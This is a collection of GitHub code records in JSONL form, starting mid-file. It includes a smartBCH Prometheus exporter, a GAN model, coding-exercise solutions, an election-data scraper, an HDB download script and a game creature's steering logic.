block\")\nSMARTBCH_BLOCK_CONTRACT_ACTIONS = Gauge(\"smartbch_block_contract_actions\", \"Contract actions in block\")\nSMARTBCH_BLOCK_TOKEN_TRANSFERS = Gauge(\"smartbch_block_token_transfers\", \"Token transfers in block\")\nSMARTBCH_BLOCK_BCH_TRANSFERS = Gauge(\"smartbch_block_bch_transfers\", \"BCH transfers in block\")\nSMARTBCH_BLOCK_LOCKED_BCH = Gauge(\"smartbch_block_locked_bch\", \"Locked BCH in block\")\n\nSMARTBCH_GAS_PRICE = Gauge(\"smartbch_gas_price\", \"Gas price\")\nSMARTBCH_PROTOCOL_VERSION = Gauge(\"smartbch_protocol_version\", \"Protocol version\")\nSMARTBCH_CHAIN_ID = Gauge(\"smartbch_chain_id\", \"Chain id\")\n\nSMARTBCH_TOTAL_CONTRACTS_CREATED = Gauge(\"smartbch_total_contracts_created\", \"Contracts created in total\")\nSMARTBCH_TOTAL_CONTRACT_ACTIONS = Gauge(\"smartbch_total_contract_actions\", \"Contract actions in total\")\nSMARTBCH_TOTAL_TOKEN_TRANSFERS = Gauge(\"smartbch_total_token_transfers\", \"Token transfers in total\")\nSMARTBCH_TOTAL_BCH_TRANSFERS = Gauge(\"smartbch_total_bch_transfers\", \"BCH transfers in total\")\nSMARTBCH_TOTAL_LOCKED_BCH = Gauge(\"smartbch_total_locked_bch\", \"Locked BCH in total\")\nSMARTBCH_TOTAL_BLACKHOLE_BCH = Gauge(\"smartbch_total_blackhole_bch\", \"BCH Fees Burnt in total\")\n\n\nEXPORTER_ERRORS = Counter(\n \"smartbch_exporter_errors\", \"Number of errors encountered by the exporter\", labelnames=[\"type\"]\n)\nPROCESS_TIME = Counter(\n \"smartbch_exporter_process_time\", \"Time spent processing metrics from bitcoin node\"\n)\n\nSATS_PER_COIN = 1e8\nWEI_PER_COIN = SATS_PER_COIN * 1e10\n\nSMARTBCH_RPC_SCHEME = os.environ.get(\"SMARTBCH_RPC_SCHEME\", \"http\")\nSMARTBCH_RPC_HOST = os.environ.get(\"SMARTBCH_RPC_HOST\", \"localhost\")\nSMARTBCH_RPC_PORT = os.environ.get(\"SMARTBCH_RPC_PORT\", \"8332\")\nSMARTBCH_CONF_PATH = os.environ.get(\"SMARTBCH_CONF_PATH\")\nMETRICS_ADDR = os.environ.get(\"METRICS_ADDR\", \"\") # empty = any address\nMETRICS_PORT = int(os.environ.get(\"METRICS_PORT\", \"9332\"))\nRETRIES = int(os.environ.get(\"RETRIES\", 5))\nTIMEOUT = int(os.environ.get(\"TIMEOUT\", 30))\nRATE_LIMIT_SECONDS = int(os.environ.get(\"RATE_LIMIT\", 5))\nLOG_LEVEL = os.environ.get(\"LOG_LEVEL\", \"INFO\")\n\n\nRETRY_EXCEPTIONS = (InWarmupError, ConnectionError, socket.timeout)\n\nRpcResult = Union[Dict[str, Any], List[Any], str, int, float, bool, None]\n\n\ndef on_retry(err: Exception, next_try: float) -> None:\n err_type = type(err)\n exception_name = err_type.__module__ + \".\" + err_type.__name__\n EXPORTER_ERRORS.labels(**{\"type\": exception_name}).inc()\n logger.error(\"Retry after exception %s: %s\", exception_name, err)\n\n\ndef error_evaluator(e: Exception) -> bool:\n return isinstance(e, RETRY_EXCEPTIONS)\n\n\n@lru_cache(maxsize=1)\ndef rpc_client_factory():\n host = SMARTBCH_RPC_HOST\n if SMARTBCH_RPC_PORT:\n host = \"{}:{}\".format(host, SMARTBCH_RPC_PORT)\n service_url = \"{}://{}\".format(SMARTBCH_RPC_SCHEME, host)\n logger.info(\"Using environment configuration\")\n return lambda: Proxy(service_url=service_url, timeout=TIMEOUT)\n\n\ndef rpc_client():\n return rpc_client_factory()()\n\n\n@riprova.retry(\n timeout=TIMEOUT,\n backoff=riprova.ExponentialBackOff(),\n on_retry=on_retry,\n error_evaluator=error_evaluator,\n)\ndef smartbchrpc(*args) -> RpcResult:\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(\"RPC call: \" + \" \".join(str(a) for a in args))\n\n result = rpc_client().call(*args)\n\n logger.debug(\"Result: %s\", result)\n return result\n\nBLACKHOLE_CONTRACT_ADDRESS=\"0x0000000000000000000000626c61636b686f6c65\"\nBRIDGE_CONTRACT_ADDRESS=\"0xc172f00ac38c8b2004793f94b33483aa704045bb\"\nBRIDGE_START_BLOCK = 238790 # first block with real txs seeding with bch\n\nlastBlockStatsRead = BRIDGE_START_BLOCK-1\n\ntotalContractsCreated = 0\ntotalTokenTransfers = 0\ntotalContractActions = 0\ntotalBchTransfers = 0\ntotalBchLocked = 0\ndef refresh_metrics() -> None:\n global lastBlockStatsRead, totalContractsCreated, totalTokenTransfers, totalContractActions, totalBchTransfers, totalBchLocked\n syncing = smartbchrpc(\"eth_syncing\")\n if syncing == False:\n blockHeight = int(smartbchrpc(\"eth_blockNumber\"), base=16)\n else:\n blockHeight = int(smartbchrpc(\"eth_syncing\")['currentBlock'], base=16)\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(blockHeight)\n\n # used for initial boot to catch up on stats\n lastBlock = None\n while lastBlockStatsRead < blockHeight:\n block = smartbchrpc(\"eth_getBlockByNumber\", hex(lastBlockStatsRead), True)\n for tx in block['transactions']:\n if tx['blockNumber'] != hex(lastBlockStatsRead):\n continue\n if tx['from'] == BRIDGE_CONTRACT_ADDRESS:\n totalBchLocked += int(tx['value'], base=16)\n if tx['to'] == BRIDGE_CONTRACT_ADDRESS:\n totalBchLocked -= int(tx['value'], base=16)\n if tx['to'] == '0x0000000000000000000000000000000000000000':\n totalContractsCreated += 1\n if len(tx['input']) >= 10 and tx['input'][0:10] == '0xa9059cbb':\n totalTokenTransfers += 1\n if int(tx['value'], base=16) > 0:\n totalBchTransfers += 1\n else:\n totalContractActions += 1\n lastBlockStatsRead += 1\n lastBlock = block\n\n if lastBlock is None:\n lastBlock = smartbchrpc(\"eth_getBlockByNumber\", hex(blockHeight - 1), True)\n logger.debug(lastBlock)\n\n blackholeBchFees = int(smartbchrpc(\"eth_getBalance\", BLACKHOLE_CONTRACT_ADDRESS, hex(blockHeight - 1)), base=16)\n\n\n blockContractsCreated = 0\n blockTokenTransfers = 0\n blockContractActions = 0\n blockBchTransfers = 0\n blockBchLocked = 0\n for tx in lastBlock['transactions']:\n if tx['blockNumber'] != hex(blockHeight - 1):\n continue\n if tx['from'] == BRIDGE_CONTRACT_ADDRESS:\n blockBchLocked += int(tx['value'], base=16)\n if tx['to'] == BRIDGE_CONTRACT_ADDRESS:\n blockBchLocked -= int(tx['value'], base=16)\n if tx['to'] == '0x0000000000000000000000000000000000000000':\n blockContractsCreated += 1\n if len(tx['input']) >= 10 and tx['input'][0:10] == '0xa9059cbb':\n blockTokenTransfers += 1\n if int(tx['value'], base=16) > 0:\n blockBchTransfers += 1\n else:\n blockContractActions += 1\n\n\n SMARTBCH_BLOCK.set(blockHeight)\n SMARTBCH_BLOCK_TRANSACTIONS.set(len(lastBlock['transactions']))\n # SMARTBCH_BLOCK_VALUES = Gauge(\"smartbch_block_value\", \"Total BCH in block\")\n SMARTBCH_BLOCK_GAS_USED.set(int(lastBlock['gasUsed'], base=16))\n SMARTBCH_BLOCK_GAS_LIMIT.set(int(lastBlock['gasLimit'], base=16))\n SMARTBCH_BLOCK_NONCE.set(int(lastBlock['nonce'], base=16))\n SMARTBCH_BLOCK_DIFFICULTY.set(int(lastBlock['difficulty'], base=16))\n SMARTBCH_BLOCK_UNCLES.set(len(lastBlock['uncles']))\n SMARTBCH_BLOCK_SIZE_BYTES.set(int(lastBlock['size'], base=16))\n SMARTBCH_BLOCK_TIMESTAMP.set(int(lastBlock['timestamp'], base=16))\n\n\n SMARTBCH_GAS_PRICE.set(int(smartbchrpc(\"eth_gasPrice\"), base=16))\n SMARTBCH_PROTOCOL_VERSION.set(int(smartbchrpc(\"eth_protocolVersion\"), base=16))\n SMARTBCH_CHAIN_ID.set(int(smartbchrpc(\"eth_chainId\"), base=16))\n\n SMARTBCH_TOTAL_LOCKED_BCH.set(totalBchLocked / WEI_PER_COIN)\n SMARTBCH_TOTAL_CONTRACTS_CREATED.set(totalContractsCreated)\n SMARTBCH_TOTAL_CONTRACT_ACTIONS.set(totalContractActions)\n SMARTBCH_TOTAL_TOKEN_TRANSFERS.set(totalTokenTransfers)\n SMARTBCH_TOTAL_BCH_TRANSFERS.set(totalBchTransfers)\n SMARTBCH_TOTAL_BLACKHOLE_BCH.set(blackholeBchFees / WEI_PER_COIN)\n\n SMARTBCH_BLOCK_LOCKED_BCH.set(blockBchLocked / WEI_PER_COIN)\n SMARTBCH_BLOCK_CONTRACTS_CREATED.set(blockContractsCreated)\n SMARTBCH_BLOCK_CONTRACT_ACTIONS.set(blockContractActions)\n SMARTBCH_BLOCK_TOKEN_TRANSFERS.set(blockTokenTransfers)\n SMARTBCH_BLOCK_BCH_TRANSFERS.set(blockBchTransfers)\n\ndef sigterm_handler(signal, frame) -> None:\n logger.critical(\"Received SIGTERM. Exiting.\")\n sys.exit(0)\n\n\ndef exception_count(e: Exception) -> None:\n err_type = type(e)\n exception_name = err_type.__module__ + \".\" + err_type.__name__\n EXPORTER_ERRORS.labels(**{\"type\": exception_name}).inc()\n\n\ndef main():\n # Set up logging to look similar to bitcoin logs (UTC).\n logging.basicConfig(\n format=\"%(asctime)s %(levelname)s %(message)s\", datefmt=\"%Y-%m-%dT%H:%M:%SZ\"\n )\n logging.Formatter.converter = time.gmtime\n logger.setLevel(LOG_LEVEL)\n\n # Handle SIGTERM gracefully.\n signal.signal(signal.SIGTERM, sigterm_handler)\n\n app = make_wsgi_app()\n\n last_refresh = datetime.fromtimestamp(0)\n\n def refresh_app(*args, **kwargs):\n nonlocal last_refresh\n process_start = datetime.now()\n\n # Only refresh every RATE_LIMIT_SECONDS seconds.\n if (process_start - last_refresh).total_seconds() < RATE_LIMIT_SECONDS:\n return app(*args, **kwargs)\n\n # Allow riprova.MaxRetriesExceeded and unknown exceptions to crash the process.\n try:\n refresh_metrics()\n except riprova.exceptions.RetryError as e:\n logger.error(\"Refresh failed during retry. Cause: \" + str(e))\n exception_count(e)\n except JSONRPCError as e:\n logger.debug(\"SmartBCH RPC error refresh\", exc_info=True)\n exception_count(e)\n except json.decoder.JSONDecodeError as e:\n logger.error(\"RPC call did not return JSON. Bad credentials? \" + str(e))\n sys.exit(1)\n\n duration = datetime.now() - process_start\n PROCESS_TIME.inc(duration.total_seconds())\n logger.info(\"Refresh took %s seconds\", duration)\n last_refresh = process_start\n\n return app(*args, **kwargs)\n\n httpd = make_server(METRICS_ADDR, METRICS_PORT, refresh_app)\n httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"blockparty-sh/smartbchd-prometheus-exporter","sub_path":"smartbchd-monitor.py","file_name":"smartbchd-monitor.py","file_ext":"py","file_size_in_byte":11303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"13883933689","text":"import tensorflow as tf\r\n\r\nclass Discriminator(tf.keras.Model):\r\n\tdef __init__(self, args, name = 'discriminator'):\r\n\t\tsuper(Discriminator, self).__init__(name = name)\r\n\t\tself.conv1 = tf.keras.layers.Conv2D(64, 7, 2, activation = tf.nn.leaky_relu)\r\n\t\tself.conv2 = tf.keras.layers.Conv2D(128, 7, 2, activation = tf.nn.leaky_relu)\r\n\t\tself.flatten = tf.keras.layers.Flatten()\r\n\t\tself.fc1 = tf.keras.layers.Dense(1)\r\n\t\tself.dis_layers = [self.conv1, self.conv2, self.flatten, self.fc1]\r\n\tdef call(self, x):\r\n\t\tfor layer in self.dis_layers:\r\n\t\t\tx = layer(x)\r\n\t\treturn x\r\n\r\nclass Generator(tf.keras.Model):\r\n\tdef __init__(self, args, name = 'generator'):\r\n\t\tsuper(Generator, self).__init__(name = name)\r\n\t\tself.fc1 = tf.keras.layers.Dense(7 * 7 * 128)\r\n\t\tself.reshape = tf.keras.layers.Reshape([7, 7, 128])\r\n\t\tself.deconv1 = tf.keras.layers.Conv2DTranspose(128, 7, 2, activation = tf.nn.leaky_relu, padding = 'same')\r\n\t\tself.deconv2 = tf.keras.layers.Conv2DTranspose(128, 7, 2, activation = tf.nn.leaky_relu, padding = 'same')\r\n\t\tself.deconv3 = tf.keras.layers.Conv2DTranspose(64, 7, 1, activation = tf.nn.leaky_relu, padding = 'same')\r\n\t\tself.deconv4 = tf.keras.layers.Conv2D(1, 3, 1, activation = tf.nn.tanh, padding = 'same')\r\n\t\t\r\n\t\tself.gen_layers = [self.fc1, self.reshape, self.deconv1, self.deconv2, self.deconv3, self.deconv4]\r\n\tdef call(self, x):\r\n\t\tfor layer in self.gen_layers:\r\n\t\t\tx = layer(x)\r\n\t\treturn x\r\n","repo_name":"WangZesen/GAN-Hinge-Loss","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"69"}
+{"seq_id":"23477095146","text":"\"\"\"\"Modifique o programa para trabalhar com duas filas.\nP/ facilitar, considere atendimento: A = fila 1. B = fila 2...etc.\"\"\"\n\nultimo = 10\nultimo_dois = 5\nfila_um = list(range(1, ultimo + 1))\nfila_dois = list(range(1, ultimo_dois + 1))\nwhile True:\n fila = (input(\"Selecione qual fila irá trabalhar 1 ou 2: \"))\n if fila == '1' or fila == '2':\n if fila == '1':\n print(f\"\\nExistem {len(fila_um)} clientes na fila\")\n print(f\"Fila atual: {fila_um}\")\n elif fila == '2':\n print(F\"\\nExistem {len(fila_dois)} clientes na fila\")\n print(f\"\\nFila atual: {fila_dois}\")\n print(\"Digite:\"\n \"\\nA ou B - Realizar o atendimento\"\n \"\\nF ou G- Fim da fila\"\n \"\\nS para Sair\")\n operacao = input(\"Digite Fila 1: A, F ou S \"\n \"\\nFila 2: B, G ou S: \")\n if operacao == 'A':\n if len(fila_um) > 0:\n atendido = fila_um.pop(0)\n print(f'Cliente {atendido} atendido!')\n elif operacao == \"B\":\n if len(fila_dois) > 0:\n atendido = fila_dois.pop(0)\n print(f'Cliente {atendido} atendido!')\n else:\n print('Fila vazia!')\n elif operacao == 'F':\n ultimo += 1\n fila_um.append(ultimo)\n elif operacao == \"G\":\n ultimo_dois += 1\n fila_dois.append(ultimo_dois)\n elif operacao == 'S':\n break\n else:\n print('\\nOperação inválida ! Digte uma das opções válidas !')\n","repo_name":"ninaai517/Python_logic","sub_path":"Cap.06/Listas/Exercícios/6.6.py","file_name":"6.6.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43162310703","text":"#!/usr/bin/env python3\n#filename: LongestSubstring_6.py\n\n\"\"\"\nThis program is a solution to a leetcode.com programming problem.\n\nLeetCode problem title: 3. Longest Substring Without Repeating Characters\n\n~~~~~~~~~~~~~~~~~~~\nProblem Description\n~~~~~~~~~~~~~~~~~~~\n\nGiven a string, find the length of the longest substring without repeating characters.\n\nExample 1:\n\nInput: \"abcabcbb\"\nOutput: 3\nExplanation: The answer is \"abc\", with the length of 3.\nExample 2:\n\nInput: \"bbbbb\"\nOutput: 1\nExplanation: The answer is \"b\", with the length of 1.\nExample 3:\n\nInput: \"pwwkew\"\nOutput: 3\nExplanation: The answer is \"wke\", with the length of 3.\n Note that the answer must be a substring, \"pwke\" is a subsequence and not a substring.\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nProvided Beginning of Solution\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~\nPseudo Code for a Solution\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n~~~~~~~~~~~~~~~~~~~\nUsing This Solution\n~~~~~~~~~~~~~~~~~~~\n\nEnter this in the shell:\npython LongestSubstring_6.py\n\n\n~~~~~~~~~~~~~~~~~~\n Notes\n~~~~~~~~~~~~~~~~~~\n\n\"\"\"\n\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n a = \"\" # substring attempt 1\n b = \"\" # substring attempt 2\n print(f's = {s}')\n for i in range(len(s)):\n if s[i] not in a:\n a += s[i]\n print(f'a = {a.ljust(10)} b = {b}')\n else:\n print(f'a = {a.ljust(10)} b = {b}')\n if len(b) < len(a):\n b = a\n print(f'a = {a.ljust(10)} b = {b}')\n print(f'a.index(s[i])+1 = {a.index(s[i])+1}')\n print(f'a[a.index(s[i])+1::] = {a[a.index(s[i])+1::]}')\n print(f'a[a.index(s[i])+1::] + s[i] = {a[a.index(s[i])+1::] + s[i]}')\n a = a[a.index(s[i])+1::] + s[i]\n\n print(f'a = {a.ljust(10)} b = {b}')\n print('')\n return max(len(b), len(a))\n\n\n\nif __name__ == '__main__':\n soln = Solution()\n soln.lengthOfLongestSubstring(\"\")\n soln.lengthOfLongestSubstring(\"a\")\n soln.lengthOfLongestSubstring(\"abcdabracadabra\")\n soln.lengthOfLongestSubstring(\"abcabcbb\")\n soln.lengthOfLongestSubstring(\"bbbbb\")\n soln.lengthOfLongestSubstring(\"pwwkew\")\n soln.lengthOfLongestSubstring(\"abcdamn\")\n soln.lengthOfLongestSubstring(\"abcdambq\")\n soln.lengthOfLongestSubstring(\"abcbamboy\")\n","repo_name":"oneforawe/code-practice","sub_path":"Python/LeetCode/003_LongestSubstring/dev/LongestSubstring_6.py","file_name":"LongestSubstring_6.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"329314336","text":"\n\nimport click\n\nfrom pathlib import Path\nfrom operator import add\n\n@click.command('67')\ndef problem_067():\n \"\"\"Maximum path sum II\n\n By starting at the top of the triangle below and moving to adjacent\n numbers on the row below, the maximum total from top to bottom is 23.\n \n **3** \n **7** 4 \n 2 **4** 6 \n 8 5 **9** 3\n \n That is, 3 + 7 + 4 + 9 = 23.\n \n Find the maximum total from top to bottom in\n [triangle.txt](project/resources/p067_triangle.txt) (right click and 'Save\n Link/Target As...'), a 15K text file containing a triangle with one-\n hundred rows.\n \n **NOTE:** This is a much more difficult version of [Problem 18](problem=18). It is not possible to try every route to solve this problem, as there are 299 altogether! If you could check one trillion (1012) routes every second it would take over twenty billion years to check them all. There is an efficient algorithm to solve it. ;o)\n \n \"\"\"\n\n triangle = load_triangle()\n while len(triangle) > 1:\n triangle = reduce_triangle(triangle, max, add)\n click.echo(triangle[0][0])\n\n\ndef reduce_triangle(triangle, pick, combine):\n ultimate = triangle[-1]\n penultimate = triangle[-2]\n new_row = tuple(\n combine(value, pick(ultimate[i], ultimate[i + 1]))\n for i, value in enumerate(penultimate))\n return triangle[:-2] + (new_row, )\n\n\ndef load_triangle():\n with Path('.', 'files', 'triangle.txt').open('r') as f:\n return tuple(\n tuple(int(i) for i in line.split(' '))\n for line in f.readlines()\n )","repo_name":"adharris/euler","sub_path":"problems/problems_000_099/problems_060_069/problem_067.py","file_name":"problem_067.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31783360541","text":"import pandas as pd\nimport requests\nfrom lxml import etree\n\n_old_uri = 'https://www.volby.cz/pls/kv2002/kv12?xjazyk=CZ&xid=0'\n_old_candidates = 'https://www.volby.cz/pls/kv2002/kv22?xjazyk=CZ&xid=0&xv=11'\n_old_base = 'https://www.volby.cz/pls/kv2002/'\n_ns = {\"re\": \"http://exslt.org/regular-expressions\"}\n_parser = etree.HTMLParser()\n\n\ndef format_candidates(df):\n df.columns = df.columns.droplevel(0)\n if 'Mandát' in df.columns:\n df['mandate'] = [True if x == '*' else False for x in df['Mandát']]\n df = df.drop(columns='Mandát')\n else:\n df = df.insert(loc=len(df.columns) - 1, column='mandate', value=0)\n return df\n\n\ndef download_city(city: str):\n html = requests.get(_old_uri).text\n href = etree.fromstring(html, parser=_parser).xpath('.//td[re:match(., \"^{0}\")]'.format(city), namespaces=_ns)[0] \\\n .getparent().getchildren()[0].find('a').attrib['href']\n html = requests.get(_old_base + href).text\n href = etree.fromstring(html, parser=_parser).xpath('.//a[re:match(., \"^3$\")]', namespaces=_ns)[0].attrib['href']\n dfs = pd.read_html(_old_base + href, flavor='html5lib')\n\n for x in [5, 6, 8, 9]:\n dfs[0][dfs[0].columns[x]] = dfs[0][dfs[0].columns[x]].str.replace(\"\\s\", '')\n\n dfs[0].insert(0, 'year', 2002)\n dfs[0].to_csv('data/summary.csv', index=False, header=False, sep=';', mode='a')\n\n dfs[1][dfs[1].columns[1]] = dfs[1][dfs[1].columns[1]].str.replace(\"\\s\", '')\n dfs[1].insert(0, 'id', range(1, len(dfs[1]) + 1))\n dfs[1].insert(0, 'year', 2002)\n dfs[1].to_csv('data/party_votes.csv', index=False, header=False, sep=';', mode='a')\n\n\ndef download_city_candidates(city: str):\n html = requests.get(_old_candidates).text\n href = etree.fromstring(html, parser=_parser) \\\n .xpath('.//td[re:match(., \"^{0}\") and not (@colspan)]'.format(city), namespaces=_ns)[0] \\\n .getnext().find('a').attrib['href']\n\n html = requests.get(_old_base + href).text\n href = etree.fromstring(html, parser=_parser) \\\n .xpath('.//td[re:match(., \"^3$\")]', namespaces=_ns)[0].getparent().getchildren()[0].find('a').attrib['href']\n\n html = requests.get(_old_base + href).text\n href = etree.fromstring(html, parser=_parser).xpath('.//td/a')[0].attrib['href']\n df = pd.read_html(_old_base + href, flavor='html5lib')[0]\n df = format_candidates(df)\n df['abs.'] = df['abs.'].str.replace(\"\\s\", '')\n df.insert(0, 'year', 2002)\n df.to_csv('data/candidates.csv', index=False, header=False, sep=';', mode='a')\n\n\ndef scrape(city: str):\n print('Scraping 2002', end=' ')\n download_city(city)\n download_city_candidates(city)\n print('✓')\n\n\nif __name__ == \"__main__\":\n city = 'Plzeň'\n download_city(city)\n download_city_candidates(city)\n","repo_name":"Eldeeqq/BI-VZD","sub_path":"01/scrapers/old.py","file_name":"old.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39638935261","text":"import os\n\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\nfrom root import ROOT_DIR\nfrom weighted_mean_prediction.data_setup import get_encoded_split_data\nfrom weighted_mean_prediction.linear_model.shared import normalise_data, fit_model\nfrom weighted_mean_prediction.model_storage import load_model\nfrom weighted_mean_prediction.regression_performance import evaluate_model, get_all_metrics, plot_residuals_histogram, \\\n plot_QQ, plot_fitted, plot_fancy_fitted\n\n\ndef reshape_data(*X):\n return [x.values.reshape(-1, 1) for x in X]\n\n\nif __name__ == \"__main__\":\n reg = LinearRegression()\n\n model_dir = f\"{ROOT_DIR}/weighted_mean_prediction/linear_model/models\"\n model_name = \"pairing_lr.joblib\"\n model_path = os.path.join(model_dir, model_name)\n\n X_train, X_val, X_test, y_train, y_val, y_test = get_encoded_split_data()\n # X_train, X_val, X_test = get_dG_data(X_train, X_val, X_test)\n X_train, X_val, X_test = normalise_data(X_train, X_val, X_test)\n X_train, X_val, X_test = reshape_data(X_train[\"dG_pairing\"], X_val[\"dG_pairing\"], X_test[\"dG_pairing\"])\n\n lm = load_model(model_path)\n lm = lm if lm is not None else fit_model(X_train, y_train[\"weighted_mean\"], model_path)\n print(lm.coef_)\n predictions, errors = evaluate_model(lm, X_test, y_test[\"weighted_mean\"])\n print(get_all_metrics(y_test[\"weighted_mean\"], predictions))\n plt.scatter(X_test, predictions)\n plt.scatter(X_test, y_test)\n plt.show()\n\n plot_residuals_histogram(predictions, y_test[\"weighted_mean\"])\n plot_QQ(predictions, y_test[\"weighted_mean\"])\n plot_fancy_fitted(predictions, y_test[\"weighted_mean\"])\n\n print(f\"y = {lm.intercept_} + {lm.coef_[0]}x\")\n","repo_name":"fegb-dataset22/dataset22","sub_path":"weighted_mean_prediction/linear_model/pairing_lr.py","file_name":"pairing_lr.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27330345356","text":"import datetime\nimport json\nimport re\nfrom pathlib import Path\n\nimport pandas as pd\nimport requests\nimport tabulate\nfrom bs4 import BeautifulSoup\n\nout = Path('parsed_xml2_downloads')\n\nif __name__ == '__main__':\n directory = Path('hdb_downloads')\n for path in directory.glob('2023-05_BTO_*.xml'):\n soup = BeautifulSoup(path.read_bytes(), 'lxml-xml')\n town = soup.find('town').text.replace('/', '+')\n project_name = soup.find('project-name').text\n print(f'{town} ({project_name})')\n\n stack = [soup]\n while stack:\n elem = stack.pop(-1)\n children = elem.findChildren()\n if children:\n stack.extend(children)\n continue\n\n if re.fullmatch(r'[0-9]{4}-[0-9]{2}/.+\\.[a-z]{2,5}', elem.text):\n r = requests.get(f'https://resources.homes.hdb.gov.sg/nf/{elem.text}', verify=False)\n if r.status_code == 200:\n out_path = out / elem.text\n out_path.parent.mkdir(parents=True, exist_ok=True)\n out_path.write_bytes(r.content)\n","repo_name":"averykhoo/macpherson-bto","sub_path":"hdb-api-samples/parse-xml2.py","file_name":"parse-xml2.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25646633950","text":"encontrado = 0\r\nnumeros = []\r\nfor c in range(3):\r\n numeros.append(int(input(f'Digite o número {c+1}: ')))\r\nnum = int(input('Número para verificar: '))\r\nfor c in range(len(numeros)):\r\n if num == numeros[c]:\r\n print(f'Encontrado na posição {c}')\r\n else:\r\n print('Não encontrado')\r\n","repo_name":"alexalvferr/fabrica","sub_path":"Exercício 84.py","file_name":"Exercício 84.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"74962586779","text":"import math\nimport random\nimport arcade\n\nimport wyggles.app\nfrom wyggles.mathutils import *\nfrom wyggles.engine import *\nimport wyggles.app\nfrom wyggles.brain import Brain\nfrom wyggles.fruit import Fruit\n\nclass WyggleBrain(Brain):\n def __init__(self, sprite):\n super().__init__(sprite)\n self.heading = random.randint(0, 359)\n self.wheel = 0\n self.focus = None\n self.state = \"wanderer\"\n self.consider_max = 10\n self.consider_timer = self.consider_max\n #\n self.munch_timer = 10\n\n def reset(self):\n self.state = ''\n self.focus = None\n\n def update(self, delta_time: float = 1 / 60):\n super().update(delta_time)\n\n def move(self):\n x, y = self.position\n to_x, to_y = self.end_pos\n\n pd = random.randint(0, 3)\n if pd == 0:\n self.micro_left()\n elif pd == 2:\n self.micro_right()\n\n steering_ndx = int(math.pi + (math.atan2(y - to_y, x - to_x)))\n delta = steering[steering_ndx][self.wheel]\n\n self.try_move(delta)\n\n \n def try_move(self, delta):\n delta_x, delta_y = delta\n next_x, next_y = 0, 0\n need_turn = False\n\n sprite = self.sprite\n pos = sprite.position\n left, bottom, right, top = sprite.left, sprite.bottom, sprite.right, sprite.top\n w_left, w_bottom, w_right, w_top = world_left, world_bottom, world_right, world_top\n\n if(left < w_left):\n delta_x = w_left - left\n need_turn = True\n elif(right > w_right):\n delta_x = w_right - right\n need_turn = True\n\n if(bottom < w_bottom):\n delta_y = w_bottom - bottom\n need_turn = True\n elif(top > w_top):\n delta_y = w_top - top\n need_turn = True\n\n #TODO:use pymunk\n '''\n if not need_turn:\n landscape_layer = wyggles.app.landscape_layer\n if landscape_layer:\n need_turn = len(arcade.check_for_collision_with_list(self.sprite, landscape_layer)) != 0\n '''\n if(need_turn):\n self.right(45)\n #self.randforward()\n self.project(self.sensor_range)\n\n nextX = self.x + delta_x\n nextY = self.y + delta_y\n self.sprite.move_to((nextX, nextY))\n\n def left(self, angle):\n heading = self.heading - angle\n self.heading = heading if heading > 0 else 360 + heading\n\n def right(self, angle):\n heading = self.heading + angle\n self.heading = heading if heading < 359 else heading - 360\n\n def micro_left(self):\n ph = self.wheel - 1\n if ph < 0:\n ph = 0\n self.wheel = ph\n\n def micro_right(self):\n ph = self.wheel + 1\n if ph > 2:\n ph = 2\n self.wheel = ph\n\n def forward(self, distance):\n x, y = self.position\n px = x + (distance * (math.cos(self.heading * degRads)))\n py = y + (distance * (math.sin(self.heading * degRads)))\n self.move_to((px, py))\n\n def randforward(self):\n self.forward(random.randint(0, self.sensor_range))\n\nsteering = [\n [(1, -1), (1, 0), (1, 1)],\n [(1, 0), (1, 1), (0, 1)],\n [(1, 1), (0, 1), (-1, 1)],\n [(0, 1), (-1, 1), (-1, 0)],\n [(-1, 1), (-1, 0), (-1, -1)],\n [(-1, 0), (-1, -1), (0, -1)],\n [(-1, -1), (0, -1), (1, -1)],\n [(0, -1), (1, -1), (1, 0)],\n]\n","repo_name":"kfields/botsley","sub_path":"examples/wyggles/wyggles/wyggle/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
